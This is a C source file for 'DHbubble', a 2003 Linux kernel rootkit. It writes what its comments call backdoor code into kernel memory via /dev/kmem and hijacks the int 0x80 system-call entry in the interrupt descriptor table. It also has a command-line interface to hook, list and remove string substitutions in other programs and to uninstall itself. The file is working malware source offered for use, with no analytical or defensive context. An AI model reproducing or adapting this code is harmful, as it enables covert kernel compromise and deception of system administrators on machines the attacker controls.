#include "kmem.h"

void hijack_idt(int interrupt)
    {
    unsigned long addr;
    unsigned long stub_addr;
    int size;
    
    fprintf(stdout,"[+] Launching KMEM/IDT hijack...\n");
    
    size = stub_end - stub_begin;
    
    addr = kmem_alloc(size);
    fprintf(stdout,"[+] Memory allocation for stub at %p\n",addr);
    
    stub_addr = addr + (my_stub - stub_begin);
    old_stub = (unsigned long) get_stub_from_idt(interrupt);

    fprintf(stdout,"[+] Old stub address saved %p \n",old_stub);
    
    //write backdoor code in kernel memory
    relocate_stub(addr,stub_begin,stub_end);
    kmem_write(stub_begin,addr,size);
    
    fprintf(stdout,"[+] Writting new stub at %p\n",stub_addr);

    //hook stub
    hook_stub(interrupt,stub_addr);
    
    fprintf(stdout,"[+] IDT stub %i hijacked! \n",interrupt);
    
    return;
    }


void resolve_symbol(void)
    {
    kmalloc_s = (void *) ksym_get("kmalloc");
    kfree_s   = (void *) ksym_get("kfree");
    printk_s  = (void *) ksym_get("printk");
    copy_from = (void *) ksym_get("__generic_copy_from_user");
    copy_to   = (void *) ksym_get("__generic_copy_to_user");

    if(!printk_s || !kmalloc_s || !kfree_s || !copy_from || !copy_to)
	{
	fprintf(stderr,"[-] Can't resolve symbol! ksym_get failed ! \n");
	fprintf(stderr,"[-] Addr of kmalloc : %p \n",kmalloc_s);
	fprintf(stderr,"[-] Addr of kfree : %p \n",kfree_s);
	fprintf(stderr,"[-] Addr of printk : %p \n",printk_s);
	fprintf(stderr,"[-] Addr of copy_from : %p \n",copy_from);
	fprintf(stderr,"[-] Addr of copy_to : %p \n",copy_to);
	exit(-1);
	}

    return;
    }


void usage(void)
    {
    fprintf(stderr,"[----- DHbubble V0.1  <mpil 2003> -----]\n\n");
    fprintf(stderr,"Syntax : DHbubble mode \n");
    fprintf(stderr,"Mode : 		\n");
    fprintf(stderr,"		install \n");
    fprintf(stderr,"			install DHbubble via /dev/kmem\n");
    fprintf(stderr,"		hook\n");
    fprintf(stderr,"			hook a string\n");
    fprintf(stderr,"			Usage : hook program old_string new_string\n");
    fprintf(stderr,"		unhook\n");
    fprintf(stderr,"			remove hook \n");
    fprintf(stderr,"			Usage : unhook hook_number\n");
    fprintf(stderr,"		list\n");
    fprintf(stderr,"			list hook \n");
    fprintf(stderr,"		uninstall\n");
    fprintf(stderr,"			uninstall DHbubble\n");
    exit(-1);
    }


__asm__(
"       .globl do_syscall               \n"
"	.align 4,0x90			\n"
"       syscall:	                \n"
"               push %ebx               \n"
"               push %ecx               \n"
//argv start at esp-12 coz we push ebx and ecx before
"               mov 12(%esp),%eax       \n"
"               mov 16(%esp),%ebx       \n"
"               mov 20(%esp),%ecx       \n"
"		mov 24(%esp),%edx	\n"
"		mov 28(%esp),%edi	\n"
"               int $0x80               \n"
"               pop %ecx                \n"
"               pop %ebx                \n"
"               ret                     \n"
);


int main(int argc, char **argv)
{
char *arg[] = {"id",NULL};
char buf[20];
char *data;
int x;

if(argc < 2)
    usage();

bzero(buf,20);
strcpy(buf,"./");
strcat(buf,NAME_PROG);    
    
if(!strcmp(argv[1],"install"))
    {
    fprintf(stdout,"[+] Launching initialization of DHbubble...\n"); 
    
    resolve_symbol();
    fprintf(stdout,"[+] Resolving of kmalloc,kfree,printk,copy_from and copy_to done!\n");

    hijack_idt(128);

    if(!strcmp(argv[0],NAME_PROG) || !strcmp(argv[0],buf))
	{
	fprintf(stdout,"[+] Calculate task_struct offset\n");

	//execute /bin/id and intercept it from kernel for calculate
	//current->comm offset 

	execve("/bin/id",arg,NULL);
	fprintf(stdout,"[+] Installation complete!\n");
	return 0;	
	}
    else
	{
	fprintf(stderr,"[-] You must keep DHbubble as program's name, or change NAME_PROG in shared.h %s %s\n",argv[0],NAME_PROG);
	exit(-1);

	}

    return 0;
    }

if(!strcmp(argv[1],"hook"))
    {
    if(argc < 5)
	usage();

    syscall(SYS_HIJACK,ADD_HIJACK,argv[2],argv[3],argv[4]);
        
    return 0;
    }

if(!strcmp(argv[1],"unhook"))
    {
    if(argc < 3)
	usage();
    
    x = (char)argv[2][0];
    
    syscall(SYS_HIJACK,DEL_HIJACK,x);

    return 0;
    }

if(!strcmp(argv[1],"list"))
    {
    data  = (char *) malloc(800);
    bzero(data,800);
        
    syscall(SYS_HIJACK,LIST_HIJACK,data);

    printf("%s",data);
    
    free(data);
    return 0;
    }

if(!strcmp(argv[1],"uninstall"))
    {
    syscall(SYS_HIJACK,UNINSTALL_HIJACK);
    return 0;
    }

usage();

return 0;
}


